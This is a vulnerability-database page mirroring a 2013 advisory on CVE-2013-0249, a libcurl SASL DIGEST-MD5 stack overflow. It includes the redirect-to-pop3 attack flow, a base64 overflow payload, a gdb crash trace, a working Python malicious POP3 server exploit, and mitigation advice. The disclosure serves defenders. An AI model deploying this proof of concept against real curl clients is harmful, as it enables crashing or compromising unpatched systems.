Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

cURL Buffer Overflow

🗓️ 08 Feb 2013 00:00:00Reported by VolemaType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 46 Views

cURL Buffer Overflow with Remote Code Executio

Related
Code
ReporterTitlePublishedViews
Family
0day.today		cURL Buffer Overflow Vulnerability
8 Feb 201300:00
zdt
Tenable Nessus		cURL/libcURL 'Curl_sasl_create_digest_md5_message()' Stack Buffer Overflow
1 Jul 201300:00
nessus
Tenable Nessus		cURL/libcURL 'Curl_sasl_create_digest_md5_message()' Stack Buffer Overflow Vulnerability
1 Jul 201300:00
nessus
Tenable Nessus		Fedora 18 : curl-7.27.0-6.fc18 (2013-2098)
25 Feb 201300:00
nessus
Tenable Nessus		GLSA-201401-14 : cURL: Multiple vulnerabilities
21 Jan 201400:00
nessus
Tenable Nessus		Mac OS X 10.x < 10.9 Multiple Vulnerabilities (BEAST)
23 Oct 201300:00
nessus
Tenable Nessus		NewStart CGSL MAIN 6.02 : curl Multiple Vulnerabilities (NS-SA-2024-0050)
10 Sep 202400:00
nessus
Tenable Nessus		Slackware 14.0 / current : curl (SSA:2013-038-01)
8 Feb 201300:00
nessus
Tenable Nessus		Ubuntu 12.10 : curl vulnerability (USN-1721-1)
13 Feb 201300:00
nessus
Check Point Advisories		cURL and libcurl MD5 Digest Buffer Overflow (CVE-2013-0249)
27 Feb 201300:00
checkpoint_advisories
Rows per page
`cURL buffer overflow  
Wed 06 February 2013  
  
Volema found remotely exploitable buffer overflow vulnerability in libcurl POP3, SMTP protocol handlers which lead to code execution (RCE). When negotiating SASL DIGEST-MD5 authentication, the function Curl_sasl_create_digest_md5_message() uses the data provided from the server without doing the proper length checks and that data is then appended to a local fixed-size buffer on the stack.  
  
Vendor notified, CVE-2013-0249 relased.  
  
Attack Concept Outline  
  
We have the permissions to send custom HTTP requests with curl. We send request to our http://evilserver.com/  
  
GET / HTTP/1.0  
Host: evilserver.com  
  
server answers with  
  
HTTP/1.0 302 Found  
Location: pop3://x:[email protected]/.  
  
"smart" curl interpretes redirect and connects to evilserver.com port 110/TCP using POP3 proto. Server answers  
  
+OK POP3 server ready  
  
curl sends  
  
CAPA  
  
servers answers with DIGEST-MD5 only  
  
+OK List of capabilities follows  
SASL DIGEST-MD5  
IMPLEMENTATION dumbydumb POP3 server  
  
so, libcurl has to send  
  
AUTH DIGEST-MD5  
  
then server sends the payload  
  
+ cmVhbG09IkFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBIixub25jZT0iT0E2TUc5dEVRR20yaGgiLHFvcD0iYXV0aCIsYWxnb3JpdGhtPW1kNS1zZXNzLGNoYXJzZXQ9dXRmLTg=  
  
and overflow happens because of fixed realm buffer size  
  
realm="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",nonce="OA6MG9tEQGm2hh",qop="auth",algorithm=md5-sess,charset=utf-8  
  
how it looks in gdb  
  
Program received signal SIGSEGV, Segmentation fault.  
0x00007fd2b238298d in ?? () from /lib/x86_64-linux-gnu/libc.so.6  
(gdb) bt  
#0 0x00007fd2b238298d in ?? () from /lib/x86_64-linux-gnu/libc.so.6  
#1 0x00007fd2b2a5cc07 in Curl_sasl_create_digest_md5_message ()  
from /home/kyprizel/test/curl-7.28.1/lib/.libs/libcurl.so.4  
#2 0x4141414141414141 in ?? ()  
...  
#1469 0x4141414141414141 in ?? ()  
#1470 0x656d616e72657375 in ?? ()  
Cannot access memory at address 0x7fff63b8b000  
  
Original exploit: pop3d.py.  
  
#!/usr/bin/env python  
# -*- coding: utf-8 -*-  
# curl pop3 CVE-2013-0249 by Volema/MSLC  
  
import socket  
import base64  
  
host = "localhost"  
port = 110  
  
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)  
s.bind((host, port))  
s.listen(5)  
sock, addr = s.accept()  
sock.send('+OK POP3 server ready\n')  
while True:  
buf = sock.recv(1024)  
print buf  
if buf.find('USER') > -1:  
sock.send('+OK\n')  
if buf.find('PASS') > -1:  
sock.send('-ERR 999\n')  
if buf.find('CAPA') > -1:  
resp = '+OK List of capabilities follows\n'  
resp += 'SASL DIGEST-MD5\n'  
resp += 'IMPLEMENTATION dumbydumb POP3 server\n'  
resp += '.\n'  
sock.send(resp)  
if buf.find('QUIT') > -1:  
sock.send('+OK')  
break  
if buf.find('AUTH') > -1:  
realm = 'A'*128  
payload = 'realm="%s",nonce="OA6MG9tEQGm2hh",qop="auth",algorithm=md5-sess,charset=utf-8' % realm  
resp = '+ '+base64.b64encode(payload)+'\n'  
print resp  
sock.send(resp)  
sock.close()  
  
  
Mitigation  
  
We recommend to disable protocols other than HTTP(S) in your application using options CURLOPT_PROTOCOLS and CURLOPT_REDIR_PROTOCOLS. libcurl version should be updated.  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
08 Feb 2013 00:00Current
0.4Low risk
Vulners AI Score0.4
EPSS0.44202
vulnerabilityremote code executionbuffer overflowsasl digest-md5libcurlcve-2013-0249pop3 protocolsmtp protocolhttp requestssecurity mitigationapplication security.
46